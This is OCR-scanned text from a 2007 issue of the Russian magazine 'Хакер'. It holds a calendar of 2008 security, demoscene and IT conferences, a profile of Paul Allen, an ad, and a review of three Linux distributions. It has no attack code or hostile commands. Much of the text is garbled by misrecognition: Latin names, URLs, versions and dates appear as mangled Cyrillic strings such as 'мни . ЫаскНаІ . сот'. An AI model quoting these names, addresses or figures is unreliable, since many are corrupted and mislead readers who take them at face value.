Іпіозесигііу — бренд международный. Впервые выставка стаким назва- 
нием прошла в Лондоне в 1996 году. Сейчасже она ежегодно проводит- 
ся в десяти странах мира, включая Россию. Организацией мероприятия 
занимается британская ВеесІ ЕхЫЫЛопз — одна из крупнейших компа- 
ний мира, занимающаяся проведением ІТ-мероприятий. 

На ІпТэзесигіІу можно послушать доклады спецов по информационной 
безопасности, посетить технические и бизнес-семинары. На выставке 
представлены самые разные разделы: «Антивирусы», «Безопасность 
локальных сетей», «Шифрование». 



Что: Вгеакроіпі 2008 



Когда : 21-24 марта 



Где: Бин ген - на- Рейне , Германия 



Сайт: Иіір : //Ьгеак 



Традиционно в марте месяце в немецком Бингене проводится демо- 
пати ВгеакроіпЛ продолжающее дело культовой Мекка & Зутровіит. 
Участников здесь меньше, чем на А55ЕМВІ_Ѵ, но именно на Вгеакроіпі: 
вручают почетные награды Зсепе.огд АѵѵагсІз. Так что если ты сценер и 
Зсепе.огд — твоя страничка по умолчанию, тебе, определенно, здесь 
будет интересно. 
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Что: Віаск Наі II 5 А 2008 



Г де : Лас-Вегас , США 



Когда : 2-7 августа 



Сайт: мни . ЫаскНаІ . сот 



Летнии Віаск Наі 



Что: Віаск Наі Еигоре 2008 



Где: Амстердам, Нидерланды 



Когда : 25-28 марта 



Сайт: мни. Ыаскпаі . сот 



Европейская версия Віаск Наі для тех, 
кому в США лететь далеко и накладно. 



Что: Р05РЕМ 



Где: Брюссель, Бельгия 



Когда : 23-24 февралг 




Сайт: мии . Іозсіет . ог; 


тівт 



Что : Віаск Наі 115/ 



Где: Вашингтон, США 



Когда: 18-21 



Сайт: мни . ЫаскНаІ . сот 



Віаск Наі — чуть ли не самое важное событие в жизни любого хакера не- 
зависимо оттого, посетил ли он его или нет. Презентации разлетаются в 
инете в момент! Еще бы: самые свежие х-іооіб, самые громкие ргооі-оі- 
сопсері, самые известные хакеры — все это дорогого стоит. 



Что: БоІТооІ 2008 4 



Где: Москва 



Когда: 21-24 октября 



Веб-сайт: ими . зотіооі . ги 



Тусовка отличается тем, что ориентирована на программное обеспечение, 
а не на железные дела. «Хакер» — один из информационных спонсоров 
выставки. На «Софтуле» представлены различные технологии управле- 
ния, раздел о логистике, аутсорсинг, электронное обучение. Тебя же, на- 
верно, более всего заинтересуют разделы ЕіпихЕапсІ и «Информационная 
безопасность». На Боііооі проводится традиционная церемония «Продукт 
года». В 2006 году, например, в конкурсе по безопасности побеждали 21оск 
1 .2 отБесигІТ и РУТОКЕН РЕ от «Актива». Без доклада оченьумных людей 
об информационныхтехнологиях в Россиитоже не обойдется. 
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Что: I) КІШС 5ргіп§ 2008 СогѵГегепсе 



Где: Бирмингем, Англия 



Когда: с 31.03.2008 по 02.04.2008 



Сайт : мии .икии8-ОГ8/еѵепі5/5ргіп82ѲѲ8 



Что: БАИБ БесигПу 2008 



Где: Новый Орлеан, США 



Когда : 11-19 января 



Сайт: мим . зала . ог%/ і пГо/ 13661 



Что: ІпРозес Іл/о г 1 сі 2008 



Где: Орландо, США] 



Когда : 8-14 марта 



Сайт: мин . ті зіі . сот 



Одна из крупнейший" конференций, которая собирает признанных \ Что: Ріогісіа Ипих БНон 2008 
специалистов по информационной безопасности. Большое количество 
конференций позволяет выбирать, причем интересное для себя здесь 
найдут как гуру, /гак и начинающие ІТ-специалисты 



Г де : Флорида , США 



Когда: 11 февраля 2008 года 



Сайт: мии . тіоп аа и пих5пом . сот 



Что : Ыі кі тапі а 2008 



Где: Атланда и Кейптаун, США 



Когда: август 



Сайт: еп.мікіресІіа.огв/нікі/Ѵ'Іікітапіа 



Что: Конференция разработчиков 
компьютерных игр (КРИ) 2008 



Где: Москва 



Когда: апрель 



Сайт: мни . кг і сопт . г и 



Что: I) 5 Е N I X Ипих 51ога§е апсі Рііезузіет 
Іл/огкзГіор 



Где: Сан-Хосе, США 



Когда: 25-26 февраля 



Сайт: мим . изепі х . огй/еѵепіз 



Что: Ипих Аисііо СопСегепсе 2008 

|л№ИМ|ДПЯ 



Где: Кельн, Германия 



Когда : с 28 



Сайт: піір : //іас . и пихаисп о . ог 



1 
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Что: СгарГіі Соп- 2008 



Где: Москва 



Когда : 23-27 июня 



Сайт: мим. 



«Графикон» — крупнейшая международная конференция то компью- 
терной графике, машинному зрению, обработке изображе/шй и видео 
натерритории бывшего СССР, ежегодно проводящаяся /России. 18-я 
конференция организуется Московским государственным университе 
1 том в период с 23 по 27 июня 2008 года 



Что: С а п 5 е сЫе 5 Т 



Где: Ванкуве 



Когда : 26-28 марта 



Сайт: мим . сапзеснезі . сот 



В 201 0 году в Ванкувере будут проведаны XXI зимние Олимпийские игры, 
но уже 2008-м ты можешь отправиться туда на известнейшую конферен- 
цию по информационной безопасности. Три дня презентаций нон-стоп, 
подготовленных исключительно профессионалами. 



Что: Бесіог 



Где: Торонто, Канада 



Когда: ноябрь 



Сайт : мин . $ес1ог . са 



Первая канадская конференция по информационным технологиям. 
В этом году была очень насыщенная программа, а среди докладчи- 
ков присутствовали именитые: ОоЬппу І_опд, Ооаппа Риікоѵѵзка, Оап 
Каттаку и РісЬагсІ Реіпег. 



Г де : Вашингтон , США 



Когда: 15-17 



Сайт: ими, гіітоосоп . ог^ 



Эта хакерская конференция на восточном побережье США привлекает 
уникальной программой мероприятий. Можно потягаться сдругими 
хакерами в конкурсе Саріиге Ібе Над, показать себя крупным дядям, 
построив с нуля корпоративную сеть, или поучаствовать в соревновании 
пс/ веселым аркадным игрушкам — кому что нравится. 



Что: К5А СопГегепсе 2008 



Где: Сан-Франциско, США 



Когда : 7-11 апреля 



Сайт: ими. г засопГе гепсе . сот 



25% ее участников являются СІ55Рз (сертифицированными специалис- 
тами по информационной безопасности), 37% имеют в этой сфере де- 
сятилетний опыт, 20% работают в компаниях с более 50 000 работников, 
причем некоторые имеют в распоряжении бюджеты свыше миллиона 
долларов, являясь директорами и ведущими специалистами. Со всеми 
ними ты сможешь пообщаться, посетив пафосную Р5А 2008. 
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Что:А5іаВ50Со п 2 0 0 8 




Где: Токио, Япония| 




Когда: 27- 


-30 марта 




Сайт: Гііір 


к //2008. 


а 5 1 аЬзсІсоп . о г 8 



Что: ЦА ЫеЬ 



Где: Киев 



Когда: март 2008 года 



Сайт: ИІІр : //сіеѵ . иамеЬ . ги 



Что: МуБОІ. СопТегепсе & Ехро 



Где: Санта-Клара, Калифорния, США 



Когда : 15-18 апреля 



Сайт: Пі1:р://еп.огеі11у.сот/ту$а12008 



Что: ОЕГСОИ 16 



Где : Лас-Вегас, США 



Когда : с 4 по 6 августа 



Сайт: ими . сіеТсоп . ог 



Только не говори, что ни разу не слышал о «Дефконе». Ведь «Дефкон» 

— это квинтэссенция крутости. Прикинь, как на тебя посмотрят друзья - 
компьютерщики, когда ты небрежно кинешь им: «На выходные слетаю 
на Оекоп». Это что-то вроде саммита «Большой восьмерки», только 
для гуру взлома. Сюда съезжаются руководители отделов безопасности 
ІТ-гигантов, независимые мастера взлома, говорят, даже сотрудники 
ФБР. Конференция существуетуже 1 5 лет и за это время стала элитарным 
клубом для гуру без намека на попсовость. 

Лучшие умы хак-андеграунда делают доклады о самых нашумевших уяз- 
вимостях за год, о способах защиты. Некоторые уязвимости обнародуются 
именно на «Дефконе». Кроме того, там ты с легкостью можешь встретить 
Джоанну Рутковскую, Циммермана и вообще любого изтех, о ком мы 
пишем в Х-ргобІе. 

Организуетфестиваль компания Віаск Наі. Цены весьма божеские — вход 
стоит 1 00 баксов. 



Что: САКЭЕХ & ІТ 5 ЕСІІКІТѴ 2008 



Где: Москва 



Когда: 24 по 26 сентября 



Сайт: мни . сагбехро . ги 



Включив в плеере известную песенку про кардера Джакса, в сентябре 
можно отправиться в Экспоцентр, для того чтобы посетить выставку, 
іосвященную безопасности банковских систем, кредитных карт и 
зообще информационных систем. Отличная возможность узнать, как 
работает современная антифрод-система в банковскихучреждениях. 
Такой опыт не помешает :). 



Где: Тампере, Финляндия 




Когда: последняя неделя 





Сайт: ним . ааветЫу . ог% 



Я незнаю, где живут самые лучшие писатели демок, ното, что их 
чертовски много в Скандинавии, это точно. А55ЕМВБУ — образцовая 
демо-вечеринка, наверное, крупнейшая илучшая в мире. Проводится 
она с 1 992 года. Упор делается исключительно на сіето-всепе и ни на что 
кроме. Самые разные номинации: Атіда, РС, С64, Іпіхо. Повсюду тысяч и 
мониторов и дисплеев ноутбуков — это надо видеть своими глазами. 
Доберешься — передай привет АЬузз'у из Рібиге Сгеѵѵ, главе оргкомитета 
пати. 
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«Я буду вполне доволен, 
если меня запомнят как че- 
ловека, который с удоволь- 
ствием работал в команде 
единомышленников над 
созданием новых технологий, 
как человека, который пытал- 
ся создавать полезные для 
общества вещи» 








«Я воодушевлен, что под- 
держиваю один из самых 
фантастических проектов 
в мире, который ищет ответы 
на некоторые фундамен- 
тальные вопросы о нашей 
Вселенной и существовании 
иных цивилизаций» (о фи- 
нансировании астрономи- 
ческого центра) 
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Х-РгоШе 



ИЛЬЯ АЛЕКСАНДРОВ 

/ АІ_ЕК5АЫОПОѴ.І@САМЕІ_АЫО.ІШ / 



Второй | 
после Билла® 



Имя: Пол Аллен (Раиі АПеп) 

Возраст: 54 года 

Место проживания: Сиэтл, США 

Состояние: 16,8 миллиарда долларов 

Сайт: ѵѵѵѵѵѵ.раиіаііеп.сот 

Один из основателей империи Місгозоіі 



Биографическая справка 

Пол родился в 1953 году в Сиэтле. Отец его был библиотекарем, что 
не помешало Аллену учиться в самой престижной школе города. В той 
же школе, где обучался Гейтс. Увлечение компами Пола было просто 
сумасшедшим, он просиживал за терминалом дни напролет. В одном 
из интервью Гейтс вспоминал, что аттестат Аллену выдали только после 
того, как его мать погасила задолженность в 200 долларов за использо- 
вание машинного времени. Учился Пол в то время, когда использование 
компьютеров было роскошью. Положение спас один из деловых центров 
в Сиэтле — родители мальчика пристроили его и Билла Гейтса туда в 
качестве бета-тестеров. Денег им за это никто платить не собирался, зато 
за обожаемыми компьютерами можно было проводить время совершен- 
но бесплатно. Профессионалы, работавшие в центре, помогали Полу в 
изучении программирования. Потом центр обанкротился и закрылся, а 
знания и опыт остались. 

В 1971 году Пол поступает в Вашингтонский университет. Тогда же они с 
Гейтсом создают свою первую фирму — ТгаЛО-ОаІа. Фирма занималась 
тем, что разрабатывала программы для составления графиков и мар- 
шрутов движения общественного транспорта. Первый блин традиционно 
оказался комом. Но деньги на покупку нового компа на базе Іпіеі 8008 у 
друзей появились. 

В 1974 году они пишут для МІТ5 интерпретатор ВА5ІС. В 1975-м регист- 
рируют Місго-воЙ, дефис из названия которой впоследствии, как извест- 
но, будет убран. 

В 1981 году ІВМ ищет разработчиков операционной системы для своих 
компьютеров. Аллен и Гейтс покупают 0-005 у Тима Паттерсона, причем 
за копейки. По некоторым сведениям, они за покупку отдали чуть больше 
тысячи долларов — точная сумма сделки неизвестна. На основе купленного 
кода Пол и Билл делают свою ось — РС-005. ІВМ покупает ее за несколько 
десятков тысяч баксов, и с каждого проданного компьютера с предустанов- 
ленной РС-005 Майкрософту идут проценты. Говорят, сейчас в бизнес-шко- 
лах эту историю приводят как пример ошибки менеджмента ІВМ. 

Позиции товарищей в М5 изначально распределились так: Пол Аллен 
был больше кодером, технарем, а Гейтс занимался финансами, продви- 
жением. Это, конечно, в некотором роде огрубление — всю работу они 
делали вместе, но тем не менее это отражает сферы их интересов. 

Ну а дальше биография Аллена должна была стать частью истории 
успеха МісгозоД, но... В 1982 году врачи ставят ему диагноз — болезнь 
Ходжкина. Эта болезнь является одной из форм рака. Полу на тот 
момент было 30 лет. Год лечения дал результаты — Аллен стал чув- 
ствовать себя значительно лучше. Но из компании, стремительно 
превращающейся в корпорацию, ему все же пришлось уйти. Впрочем, 
второй по величине пакет акций позволял не думать о том, на что 
жить. 







Проекты 

После ухода из МісгозоЛ Пол взялся за собственные проекты. Первый 
— Азутеігіх, фирма, основанная в 1985 году. Она занималась создани- 
ем средств разработки, причем таких, которые должны были позволить 
писать свои программы даже далеким от кодинга людям. Увы, но успеха у 
продукта не было. 

Следующая попытка — 5куріх. Теперь Пол занялся разработкой стандарта 
спутниковой связи. Снова миллионные вложения, снова, казалось бы, 
интересные разработки, но слишком дорогие для реализации в то время. 
В 1992 году создается Іпіегѵаі Везеагсб Согр. — научная лаборато- 
рия, так толком и не предоставившая публике своих достижений. 
Поговаривают, что в нее Аллен вложил от 0,25 до 1 миллиарда дол- 
ларов. В 2000 году штат сотрудников был распущен с требованием 
неразглашения экспериментов. Что изобретали эти ученые в стенах 
компании Аллена?.. 

Пол и сегодня занимается бизнесом, инвестируя деньги в разные ком- 
пании. Не забывает он и благотворительности, спонсируя фонды для 
поддержки больных раком и СПИДом, финансирует фестивали и универ- 
ситеты. 

Хобби 

Является владельцем баскетбольного (в НБА) и футбольного (в 
Национальной футбольной лиге, речь идет об американском футболе] 
клуба. 

Играет на гитаре, поклонник Джимми Хендрикса. Любит шахматы. Как 
и многие очень богатые люди, часто отдыхает на собственной яхте. 
Поговаривают, что также увлекается игрой в карты. И-И 



ХАКЕР 12 /108/ 07 






Новинки по осени 
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ОБЗОР ПОПУЛЯРНЫХ иииХ-ДИСТРИБУТИВОВ — ОСЕНЬ 2007 



Так уже повелось, что разработчики Ілпих-дистрибутивов почти весь год кормят нас 
альфами и бетами, а выставляют на наш суд свои творения осенью. Прошедший октябрь 
не стал исключением — релизы объявлялись один за другим. Мы тщательно протести- 
ровали три популярных дистрибутива со средой КОЕ — ОрепЗШЕ 10.3, Егеезріге 2.0.6, 
Мапбгіѵа Опе 2008.0 — и сегодня представляем тебе отчет об этих новинках. 



В 0РЕЫ51/5Е 10.3 

Краткая информация о дистрибутиве 

| ЬНрУ/ги.орепзизе.огд 
ІЫоѵеІІ, Іпс. 

1 октября 2007 года 
ІЫоѵеІІ 

|х86, х86_64, Роѵѵег РС 

ІІпіеІ Репііит или АМР СРЮ, 256 Мб РАМ и 4 Гб 



Сайт проекта: 



Производитель: 



Цата выхода: 



Пицензия: 



Системные требования: 



(КОЕ) или 1 Гб минимум + 256 Мб подзѵѵар 

Кегпеі 2.6.22.5, ОСС 4.2.1, СІіЬс 2.6.1, КйЕ 3.5.7, Х.огд 7.2, Сотріі 0.5.4, 
ОрепОШсе.огд 2.3 



Предыдущая версия ОрепБУБЕбыла выпущена почти год назад, в декабре 
2006-го. Для повышения качества аІрЬа/Ье^а тестирование длилось почти 
полгода, а цикл разработки увеличился. Для загрузки на сайте проекта 
доступны Сй- и ОѴО-образы, собранные для разных архитектур. В случае 



Сй-варианта придется выбирать образ с КйЕ 3.5.7 или Споте 2.20. В 
ОѴО-версии доступна и бета КОЕ 4.0. В Сй-варианте с КйЕ, о котором и 
будем говорить далее, поддерживается только английский язык. Другие 
локализации можно установить, используя пакеты из репозитария или диск 
Ехіга І_апдиаде5. Отдельный образ Абб-Оп Сй содержит несвободное ПО. 
Если планируется установка посети с НИР, РТР, ЫР5, БМВ или сжесткого 
диска, можно использовать мини-Сй с минимальным набором, обеспе- 
чивающим только загрузку системы. Кстати, практически одновременное 
релизом стала доступна и русскоязычная документация по дистрибутиву 
[ ги.орепзизе.ога ). 

Крометрадиционной загрузки с привода система также устанавливается 
посредством РХЕ-загрузки или даже прямо из ѴѴіпбоѵѵз. В последнем 
случае после ответа натри вопроса мастера диск может вообще больше 
не понадобиться, так как дальнейшая установка можетбыть выполнена из 
репозитария 0реп51б5Е. Процесс установки сложностью не отличается, вы- 
бираем русский язык и следуем указаниям Уа5Т. Бросается в глаза обилие 
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различных вариантов восстановления системы, предлагаемых в процессе 
установки. Это большой плюс, так как пользователь любого уровня сможет 
без проблем привести в порядокупавшую систему. Если производится 
установка 64-битного варианта на 64-битную платформу, нажав клавишу 
<Е7>, можно изменитьархитектуруустанавливаемой системы на 32-битную 
(правда, загружать ее придется из репозитария]. Кстати, разработчики не 
изменили своим традициям и подарили своим поклонникам очередное 
«пасхальное яйцо». При нажатии клавиши <Р8> появляется переливающе- 
еся изображение фирменного хамелеона, убирающееся по <Р9>. 

Привод ОѴй обозначен как/сІеѵ/вгО. Вслед за Ребога ОрепБЭБЕ перешел на 
использование ІіЬаЕа, поэтому ника ких/беѵ/Ьба не будет. В процессе анализа 
устройств Уа5Т выдаетзапросы на активацию некоторых модулей найденных 
устройств, например для работы с ІІ5В-накопителями. РІеоднократно отме- 
чалось, что новый релиз станетболее понятен для начинающих пользовате- 
лей; оченьсомневаюсь, чтоони поймути по достоинству оценят подключе- 
ние модулей. В процессе установки можно подключить сетевые репозитарии 
и включить дополнительный диск. После анализа системы УаБТ предложит 
свой вариантустановки, втом числе раз метку жестко го диска, выбор при- 
ложений, региональныеустановки. РІам остается только щелкнуть кнопочку 
«Принять» — все остальное УаБТ сделает сам. При ручной разметке разделов 
можно указать любую из файловых систем: вѵѵар, ех{2/3, РеізегРБ.ХРБ и 6Р5. 
Хотя при выборе последней появляется сообщение о том, что эта файловая 
система не поддерживается ОрепБІІБЕ, так как недостаточно протестиро- 
вана и может неправильно интегрироваться в систему. Есть возможность 
указать дополнительные параметры монтирования и зашифровать файловую 
систему, втом числе и корневую. Сам процесс установки, даже на далеко не 
самом современном оборудовании, занимает всего минут 20. 

Далее следует перезагрузка и первичная настройка системы. Причем, в 
отличие отустановки, интерфейс Уа5Т здесьуже исключительно на анг- 
лийском. Сеть можетбыть настроена автоматически при помощи 2егосопіУ 
АѵаЬі, хотя доступны библиотеки совместимости с тОЫЭРезропсІег. Обрати 



внимание на сетевые настройки поумолчанию: протокол ІРѵб включен, 
брандмауэр активирован, доступ по 55Н закрыт. При этом весьма полезной 
является возможность переопределить назначение сетевых карт, указав 
в настройках, во вкладке «ОепегаІ-> Рігеѵѵа112опе», их принадлежность к 
внутренней или внешней сети, ОМ2 или N 0 2опе (весьтрафик блокируется). 
Здесьже выбирается вариантактивации устройства и параметры МТІІ. 
Удобно также, что во время установки можно настроить другие виды соеди- 
нений: В5І_, 150 N , РРРоЕ и модем, разрешитьдоступ по ѴЫС, атакже метод 
аутентификации (локальный, Ай, 1_0АР, N15). 0реп51)5Е предоставляет 
два способа управления сетевыми интерфейсами:традиционный (Тир) и 
КЫеІѵѵогкМападег. Если выбран последний вариант, у пользователя будет 
возможность включать и выключать сетевые интерфейсы. Флажок«С1опе 
ТЫз Бузует ТэгАиІоУаБТ» в последнем окне сохранитпрофильустановки в 
файл /гооѴаиІюуазЕхтІ. 

Специальных замеров я не производил, но загружается 0реп51І5Е заметно 
быстрее, чем все дистрибутивы, участвующие в обзоре, плюс КУЬипІи. Все, 
начиная с загрузчика Сгиб и заканчивая рабочим столом, выполнено в 
единой зеленоватой цветовой гамме. Некоторые менюУаБТ уже переве- 
дены, без установки пакетов локализации. Приятно, что сразу же работает 
клавиатурная раскладка, переключение производится по <СМ-5ЫТ>, 
причем предложен вариантѵѵіпкеуз. Вывод «дІхіпЬ | дгер гепбегіпд» на 
двух радеонах показал, что 30-ускорение работает, поэтому сразу же можно 
оценить фичи Сотріг 0.5.4. Благодаря піТв-Зд нам становится доступна 
запись в раздел с файловой системой ЫТР5. 

В меню«Уа5Т -> Программное обеспечение -> Репозитарии сообщества» 
можно дополнительно выбрать репозитарии: Расктап, Сиги, 055, поп-055. 
А при помощи апплета, помещенного на «Панель задач», удобно произ- 
водить обновление дистрибутива. В этой версии дистрибутива впервые 
реализована возможность 1 -Сііск іпзіаіі — для установки приложения 
достаточно одного щелчка мышкой. Вообще-то, щелчка часто сделать 
нужно целыхтри, но пользователям Ыпзріге/РгееБріге, устанавливающим 
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приложения с помощью СІіск’Ы’Рип, гордиться особо уже и не чем. 
Традиционно в дистрибутивах от Ыоѵеіі защиту от сетевых атак и вирусов 
обеспечивает комплекс Ар рАгтог. Выбрав одноименный пунктв Ѵа5Т, мож- 
но добавить профиль вручную или, используя мастер, обновить профили из 
репозитария, править/удалятьлокальные профили. 

Несколько путает ситуацию то, что в ОрепБІІБЕ четыре программы настрой- 
ки: Уа5Т, Сопбдиге Бевкіор («Центр управления КОЕ»), СК43еКіпд и 5ах2, 
которые ктомуже в некоторых вопросах дублируют друг друга. На рабочем 
столе размещен ярлык Му СотріЛег, выбор которого покажет системную 
информацию (вувіпРэ:/). Вставленная флешка была распознана и смонтиро- 
вана, однако ярлыке новым томом на рабочем столе не появился. Безопасно 
размонтировать подключенный накопитель можно как раз из Му Согприіег, 
хотя если некоторое время его нетрогать, то он размонтируется автоматичес- 
ки. Дистрибутив ОрепБІІБЕ 10.3 изначально поддерживает воспроизведение 
трЗ-композиций и фильмов в популярных форматах. Если нужного кодека в 
системе нет, то при выборе файла появится запрос на его установку. 



^ РРЕЕ5РІКЕ 2.0.6 5КІРМСК 



Краткая информация о дистрибутиве 

ѵѵѵѵѵѵ. \ ге е в р і ге . о гд 
Ыпвріге, I пс. 

12 октября 2007 года 
Ргеевріге ЕпсІ ІІвег Ысепве Адгеетепі 
х86 

п{еІ Репбит или АМР СРІІ, 256 Мб РАМ и 4 Гб н 



Сайт проекта: 



Производитель: 



Цата выхода: 



Мицензия: 



Аппаратные платформы 



Системные требования: 



256 



Мб под вѵѵар 

Кегпеі 2.6.20, 6СС 4.1 .2, СІіЬс 2.5, КОЕ 3.5.6, Х.огд 1 .20, ОрепОШсе.огд 2.2 



После своего основания (2001 год) компания Ыпсіоѵѵе, I пс. занималась раз- 
работкой дистрибутива ЫпсІоѵѵвОБ, отличающегося улучшенной совмести- 
мостью с приложениями ѴѴіпбоѵѵв за счет использования ѴѴіпе АРІ. Однако 
позднее эта затея была оставлена в пользуупрощенной системы установки 
программ СІіск’ІМ’Рип (СЫР), базирующейся на дебиановском АРТ, к кото- 
рому был добавлен графический интерфейс и подписка на репозитарий. 
Название нового дистрибутива не понравилось корпорации МісговоЙ, кото- 
рая сразуже подала в суд иск о созвучности ЫпсІоѵѵзсѴѴіпсІоѵѵз. Кончилось 
все тем, что основатель компании Майкл Робертсон разбогател на $20 млн, 
продав торговую марку, а дистрибутив стал называться Ыпвріге (отЫпих и 
іпвріге — «вдохновлять»). 

В августе 2005 года в Сети появилась бесплатная неофициальная вер- 
сия дистрибутива, в ЫѵеСО-варианте получившая название Ргеевріге, 
а уже в апреле 2006-го было официально объявлено о новом дистрибу- 
тиве, который будет поддерживаться открытым сообществом. Позици- 
онировался Ргеевріге как законченное десктоп-решение, работающее 
«из коробки». В него изначально включены все необходимые (втом 
числе и закрытые) драйверы и поддержка мультимедийных форматов 



(гпрЗ, ѴѴіпбоѵѵв Мебіа, Пеаі Ыеіѵѵогкв, Заѵа и РІавИ). В качестве обоз- 
начений основных релизов Ыпзріге/Ргеезріге используются названия 
рыб, которые обитают в водоемах, расположенных около штаб-квартиры 
компании. Первая версия особой популярностью не пользовалась; в 
августе этого года вышла вторая версия, за основу которой взят КІІЬипІи 
7.04, а не ОеЬіап, какэто было раньше. Таким образом, Ргеевріге кратко 
можно охарактеризовать как КІІЬипІи + проприетарное ПО + кодеки + 
драйверы для графических карт АТІ и пѴісііа, ѴѴі-Рі адаптеров, ѴѴіп-мо- 
демов и других устройств. В октябре вышел Ыпвріге 6.0, а разработчики 
Ргеевріге обновили релиз до 2.0.6. 

Загрузка дистрибутива напоминает ІІЬипІи, только по умолчанию предла- 
гается установить Ргеевріге на жесткий диск или использовать диск в ка- 
честве ІЫѵеСО. Выбор русского по <Р2> практически ничего не дает, поэтому 
можно и не стараться. Если нажать на клавишу <Евс>, последуетзапрос на 
выход из графического режима установки в консольный, что само по себе 
интересно; в ІІЬипШ приходится использовать дискаЯетаІе. 

После загрузки тебя встретит окно мастера предварительной настройки, 
который задаст кучу вопросов. Выбор ответа приводит кзапуску специфи- 
ческого приложения из КОЕ, вроде КІІзег. Последний шаг— предложение 
подписаться на сервис СЫР ( ѵѵѵѵѵѵ.спг.сот ). Не знаю, почему разработчики 
посчитали, что пользователю будетудобно каждый раз при запуске в ЫѵеСО 
настраивать параметры с помощью мастера, тем более что система сама 
все отлично находит (по крайней мере мне оборудование настраивать не 
пришлось). 

Рігеіюх с л инком на СЫР назван просто — ѴѴеЬ Вгоѵѵвег. Очевидно, 
количество наложенных патчей не позволило назвать Огненного Лиса 
его настоящим именем. В качестве поискового сервиса используется, 
какобычно, боодіе, но в раскрывающемся списке можно найти еще 
несколько ссылок, втом числе и І_іѵе Беагсб, — сказываются последс- 
твия сделки с МісговоЛ. Почтовый клиент, ярлык которого помещен 
на панели, запускает приложение, названное также просто — Етаіі, в 
народе он более известен какТЬипсІегЬігсІ. Только Рісідіп избежал участи 
переименования. 

Кстати, на обоях можно прочитать неприметную надпись (по умолчанию 
она прикрыта панелью), что-то вроде «РоѵѵегесІ Ьу ІІЬипІи». 

Все разделы на жестком диске были найдены, хотя без эксцессов не 
обошлось. Ярлыки для РАТ и ЫТРБ были вынесены на рабочий стол, а 
разделы, отформатированные в ПеівегРБ и ехіЗ, сразуже смонтиро- 
ваны в /тпТ Интересно, что корневой раздел, на котором установлен 
КІІЬипІи, так и помечен — /тпі/иЬипІи. Попытка смонтировать РАТ- и 
ЫТРБ-разделы щелчком по ярлыку привела к выдаче ошибки. Ріо в 
бпоте РагіШоп ЕсЫог (ОРагІесІ) РАТ-раздел смонтировался без про- 
блем, а для МТРБ был затребован недостающий модуль. 

РІеудобно, что в файловом менеджере Копциегог по умолчанию спрятана 
адресная строка — тяжело сориентироваться, где в данный момент 
находишься. 
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Меню КйЕ разработчики несколько изменили, все программы собраны 
по категориям в Кип Ргодгатз. Для новичка, может, это и удобно, а так 
приходится выполнять дополнительные телодвижения, чтобы запус- 
тить нужную программу. Остальные пункты в корне меню отвечаютза 
доступ к документам, поиску, помощи и настройкам. Особо радует пункт 
Тегтіпаіе Арріісабоп, запускающий хкііі. Очевидно, разработчики 
не совсем доверяют своему детищу и подстраховываются на всякий 
случай. Все основные настройки производятся в КйЕ'шном Сопігоі 
Сепіег, здесь больших сюрпризов нет. Из доступных языков интерфейса 



в списке только английский. В дополнительном подменю Абб Шопа I 
Орбопз можно найти АТІ Сопігоі, РігеБІагІег (настройка брандмауэра), 
ВРагІеб, ссылку на каталог для автозапуска программ и некоторые 
другие. В общем, запутаться здесь в чем-то сложно. В трее висит и 
КЫеІѵѵогкМападег, отвечающий за настройку сети. Кроме этого, на 
рабочем столе расположены ярлыки: СЫР, СотріЛег (некий аналог 
Моего компьютера в ѴѴіпсІоѵѵз), Ыеіѵѵогк ЗЬаге Мападег (монтирование 
сетевых ресурсов), ОРагІесІ (изменение и монтирование разделов 
диска). Здесь же находится ярлык Іпвіаіі Ргеезріге, выбор которого 




Позвольте сотрудникам реализовать свои потен циан. 
Выберите компьютер "Передовик"' на базе д&ухьядерного 
процессор л Іп)е1® Сеге" 1 ? Пію 



(812) 703-10-50 сетевая интеграция, ноутбуки, 
(812) 325-25-05 рабочие станции и периферия 



«І Пол юс 

Компьютеры 



Высочайшая производительность. 
>^ехнология, на которою 
"можно положиться!^ 






итхспб 



позволитустановить дистрибутив на жесткий диск. Этот процесс даже 
проще, чем в ІІЬипІи. Состав приложений несколько удивил. Обычно 
утилиты в дистрибутивах с КОЕ практически одинаковы, приложения, 
как правило, построены на СЦ-библиотеках и максимально интегриру- 
ются в рабочее окружение. Здесь же полный бардак. Так, вместо Кореле 
используется Рібдіп, вместо ТЬипбегЫгб — КМа і I, отсутствуют менедже- 
ры персональной информации. Хорошо, что хоть КРІауег оставили. Есть 
и два приложения собственной разработки: І_рЬоІо и І_вопд5. Первое 
представляет собой некий аналог Рісаза, позволяющий организовать 
коллекцию рисунков, запускать слайд-шоу, создавать скринсейверы 
и веб-страницы, отправлять на етаіі, записывать их на диск. Есть и 
простые функции редактирования, подходящие для работы с фото- 
графиями. Вторым попытались заменить Ата го к (и чем он помешал 
разработчикам?]. Сейчас для І_іпих существует столько проектов, что, 
честно говоря, непонятно, зачем снова изобретать велосипед, лучше 
бы довели до ума то, что есть. Но приятно, что в системе присутствуют 
необходимые кодеки, все играет и показывает :]. 

Приложения устанавливаются при помощи СЫР, хотя можно просто зай- 
ти на сайтѵѵѵѵѵѵ.спг.сот, выбрать нужное приложение и нажать напротив 
него ссылку Іпзіаіі поѵѵ. Установочные файлы имеют расширение спг; 
при щелчке правой кнопкой в контекстном меню появляется пункт Ореп 
ѵѵііб СЫР. Второй путь традиционный — использование АРТ и арійибе, 
причем в /еіс/арі/зоигсез.іізі; можно подключить убунтовский репозита- 
рий и ставить пакеты из него. 



^ МАЫРРІѴА (ЖЕ 2008.0 



Краткая информация о дистривутиве 

ѵ/ѵѵѵѵ.тапбгіѵа.сот 
Мапбгіѵа А.5. 

9 октября 2007 года 
Мапбгіѵа 

|х86 (версия Мапбгіѵа Егее и х86_64) 

Іпіеі Репбит или АМР СРІІ, 256 Мб РАМ и 4 Гб + 256 



Сайт проекта: 



Производитель: 



Цата выхода: 



Мицензия: 



Аппаратные платформы 



Системные требования: 



Мб под зѵѵар 

Кегпеі 2.6.22.9 (с патчем Сотріеіеіу РаігЭсЬебиІег), ОСС 4.2.2НС1 , СІіЬс 
2.6.1, КйЕ 3.5.7, Х.огд 7.2, СотрііО.5.2, Мебзве, ОрепСЖісе.огд 2.2.1 



Вариант Мапбгіѵа Опе является ЫѵеСО-версией, поставляемой на 
одном Сй-диске. В его поставку включены закрытые драйверы к видео- 
картам пѴібіа и АТІ, беспроводным устройствам на чипах Іпіеі, а также 
РІазЬ- и баѵа-плагины. Для закачки доступны два варианта (с рабочей 
средой КйЕ или Споте], собранные под 32-битную платформу. В преж- 
них версиях образ Мапбгіѵа Опе с КйЕ распространялся в нескольких 
вариантах локализации, сегодня доступен только один вариант, но зато 
в нем есть все, что необходимо для отображения элементов рабочего 
стола на выбранном при загрузке языке. 

Для свободной закачки доступна и версия Мапбгіѵа Ргее — традици- 
